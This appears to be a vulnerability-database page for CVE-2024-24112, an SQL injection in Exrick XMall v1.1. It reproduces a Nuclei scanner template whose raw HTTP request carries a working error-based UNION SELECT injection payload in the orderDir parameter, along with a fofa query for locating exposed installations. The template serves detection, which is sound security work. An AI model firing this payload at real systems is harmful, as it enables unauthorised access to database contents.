| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
| CVE-2024-24112 | 6 Feb 202402:26 | – | circl | |
| Exrick XMall Security Vulnerability | 6 Feb 202400:00 | – | cnnvd | |
| CVE-2024-24112 | 6 Feb 202400:00 | – | cve | |
| CVE-2024-24112 | 6 Feb 202400:00 | – | cvelist | |
| CVE-2024-24112 | 6 Feb 202401:15 | – | nvd | |
| CVE-2024-24112 | 6 Feb 202401:15 | – | osv | |
| Sql injection | 6 Feb 202401:15 | – | prion | |
| PT-2024-20276 · Xmall · Xmall | 5 Feb 202400:00 | – | ptsecurity | |
| CVE-2024-24112 | 23 May 202509:37 | – | redhatcve | |
| CVE-2024-24112 | 6 Feb 202400:00 | – | vulnrichment |
id: CVE-2024-24112
info:
name: Exrick XMall - SQL Injection
author: DhiyaneshDk
severity: critical
description: |
XMall v1.1 was discovered to contain a SQL injection vulnerability via the 'orderDir' parameter.
impact: |
Unauthenticated attackers can extract sensitive database information via SQL injection in the orderDir parameter.
remediation: |
Update Exrick XMall to a version newer than 1.1.
reference:
- https://github.com/Exrick/xmall/issues/78
- https://nvd.nist.gov/vuln/detail/CVE-2024-24112
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2024-24112
cwe-id: CWE-89
epss-score: 0.03348
epss-percentile: 0.87207
cpe: cpe:2.3:a:exrick:xmall:1.1:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: exrick
product: xmall
fofa-query: app="XMall-后台管理系统"
tags: cve,cve2024,xmall,sqli,vuln
variables:
num: "{{rand_int(9000000, 9999999)}}"
http:
- raw:
- |
GET /item/list?draw=1&order%5B0%5D%5Bcolumn%5D=1&order%5B0%5D%5Bdir%5D=desc)a+union+select+updatexml(1,concat(0x7e,{{md5(num)}},0x7e),1)%23;&start=0&length=1&search%5Bvalue%5D=&search%5Bregex%5D=false&cid=-1&_=1 HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- "{{md5(num)}}"
- "MySQLSyntaxErrorException"
condition: and
- type: status
status:
- 200
# digest: 490a004630440220081451d9f3ec1449cef7aac11dea0cbb5f3d5e1e985a332687e40e3b42a4c0fd022050f65996afbe73173ffafab7805638fc5093203c656295e18fbca9846f8f57ac:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation